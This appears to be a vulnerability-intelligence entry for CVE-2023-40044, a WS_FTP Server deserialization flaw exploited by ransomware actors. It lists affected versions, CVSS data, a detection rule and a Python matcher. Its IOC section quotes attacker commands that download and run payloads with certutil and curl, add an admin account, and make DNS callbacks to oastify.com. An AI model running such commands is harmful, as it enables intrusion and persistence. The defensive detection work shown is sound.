CVE-2023-40044
published 2023-09-27


Priority: P1 · 98 · high · 8.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Tags: KEV, ITW, EXPLOIT, Ransomware
CISA Known Exploited Vulnerability, due 2023-10-26
Exploited in the wild
EPSS: 90.15% (99.8th percentile)
In WS_FTP Server versions prior to 8.7.4 and 8.8.2, a pre-authenticated attacker could leverage a .NET deserialization vulnerability in the Ad Hoc Transfer module to execute remote commands on the underlying WS_FTP Server operating system.

Affected

4 ranges

Vendor                        | Product       | Version range     | Fixed in
progress                      | ws_ftp_server | < 8.7.4           | 8.7.4
progress                      | ws_ftp_server | >= 8.8 < 8.8.2    | 8.8.2
progress_software_corporation | ws_ftp_server | >= 8.7.0 < 8.7.4  | 8.7.4
progress_software_corporation | ws_ftp_server | >= 8.8.0 < 8.8.2  | 8.8.2

Detection & IOCs (extracted from sources)

filename: xmpp.exe
path: C:\programdata\ft.exe
filename: svchostt.dll
command: /c certutil -urlcache -f hxxp://103[.]163[.]187[.]12:8080/{22-length-alphanumeric-string} %TEMP%\{10-length-alpha-string}.exe & start /B %TEMP%\{same-10-length-alpha-string}.exe
command: /c cmd.exe /C curl 45[.]93[.]138[.]44/cl.exe -o C:/cl.exe
command: -i -c "cmd /c net user temp p@ssw0rd123 /add && net localgroup administrators temp /add"
command: /c cmd.exe /C nslookup 2adc9m0bc70noboyvgt357r5gwmnady2[.]oastify[.]com
sigma:
endpoint.os = 'windows' AND event.category = 'process' AND src.process.name in:anycase ('w3wp.exe') AND src.process.cmdline contains 'WSFTPSVR_WTM' AND tgt.process.cmdline contains ('certutil', 'mshta', 'powershell', 'pwsh', 'cmd', 'curl', 'wmic', 'nslookup', 'ping', 'whoami')
  • Post-exploitation Attack Chain 1: w3wp.exe (WSFTPSVR_WTM) spawns PowerShell that decodes a Base64/Gzip payload, then uses certutil with -urlcache -f to download and execute a payload from an IP-literal URL on port 8080.
  • Post-exploitation Attack Chain 2: w3wp.exe spawns curl to download cl.exe from attacker-controlled infrastructure, then executes it. Also uses tmpfiles.org and oastify.com (Burp Collaborator) domains for payload delivery and OOB callback.
  • Post-exploitation Attack Chain 3: Attacker drops executables (n1.exe, n2.exe, s.exe, xmpp.exe, ft.exe) to C:\ProgramData, creates a local admin account named 'temp' with password 'p@ssw0rd123', and uses nslookup for OOB DNS callbacks to oastify.com subdomains.
  • Rapid7 observed the same Burp Suite (oastify.com) domain used across all incidents, suggesting a single threat actor or shared tooling. Oastify.com subdomains in DNS/network logs are a strong indicator of exploitation activity.
  • The process execution chain is consistent across all observed exploitation instances, indicating likely mass exploitation. The parent process is always w3wp.exe with the WSFTPSVR_WTM application pool.
  • Ransomware actors used the open-source GodPotato tool for privilege escalation to NT AUTHORITY\SYSTEM after exploiting CVE-2023-40044. Monitor for GodPotato execution following w3wp.exe activity.
  • Approximately 2,900 WS_FTP hosts were internet-exposed with their webserver accessible at time of disclosure; exploitation requires the webserver component to be reachable.
  • The only complete remediation is upgrading to WS_FTP Server 8.7.4 or 8.8.2 using the full installer; partial updates are insufficient.
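The detection rule above, re-expressed as a small Python matcher and run over constructed sample process events (added example, not code from the page's sources; the flat event-dict field names and the sample telemetry are assumptions, not any vendor's real schema):

```python
# Added example: Python version of the page's w3wp.exe -> LOLBin rule for
# CVE-2023-40044 post-exploitation. Event-dict layout is an assumption.

LOLBINS = ("certutil", "mshta", "powershell", "pwsh", "cmd",
           "curl", "wmic", "nslookup", "ping", "whoami")
OOB_DOMAIN = "oastify.com"  # Burp Collaborator domain seen across incidents


def classify(event):
    """Return the reasons an event matches the rule, or [] if it does not.

    Mirrors the page's logic: Windows process event, parent w3wp.exe whose
    command line names the WSFTPSVR_WTM app pool, child command line that
    contains one of the listed tools. Matching is substring-based and
    case-insensitive, like the original 'contains' clauses, so it can also
    fire on benign children; the returned reasons help triage those hits.
    """
    if event.get("os") != "windows" or event.get("category") != "process":
        return []
    parent = event.get("src_name", "").lower()
    parent_cmd = event.get("src_cmdline", "").lower()
    child_cmd = event.get("tgt_cmdline", "").lower()
    if parent != "w3wp.exe" or "wsftpsvr_wtm" not in parent_cmd:
        return []
    reasons = ["tool:" + t for t in LOLBINS if t in child_cmd]
    if reasons and OOB_DOMAIN in child_cmd:
        reasons.append("oob:" + OOB_DOMAIN)  # strong indicator per the page
    return reasons


def find_exploit_chains(events):
    """Map the index of every firing event to its list of reasons."""
    hits = {}
    for i, event in enumerate(events):
        reasons = classify(event)
        if reasons:
            hits[i] = reasons
    return hits


# Constructed sample telemetry; 198.51.100.0/24 is a documentation range.
W3WP_WSFTP = r'c:\windows\system32\inetsrv\w3wp.exe -ap "WSFTPSVR_WTM"'
SAMPLE_EVENTS = [
    {"os": "windows", "category": "process", "src_name": "w3wp.exe",
     "src_cmdline": W3WP_WSFTP,
     "tgt_cmdline": r"cmd.exe /c certutil -urlcache -f http://198.51.100.10:8080/x %TEMP%\a.exe & start /B %TEMP%\a.exe"},
    {"os": "windows", "category": "process", "src_name": "w3wp.exe",
     "src_cmdline": W3WP_WSFTP,
     "tgt_cmdline": "conhost.exe 0xffffffff -ForceV1"},  # benign child
    {"os": "windows", "category": "process", "src_name": "w3wp.exe",
     "src_cmdline": r'c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool"',
     "tgt_cmdline": "powershell.exe -enc AAAA"},  # other app pool: no hit
    {"os": "windows", "category": "process", "src_name": "W3WP.EXE",
     "src_cmdline": W3WP_WSFTP,
     "tgt_cmdline": "cmd.exe /C nslookup abc123.oastify.com"},
]

if __name__ == "__main__":
    for idx, reasons in find_exploit_chains(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(reasons)}")
```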

CVSS provenance

nvd: v3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
vulncheck: 10.0 CRITICAL
cisa: 8.8 HIGH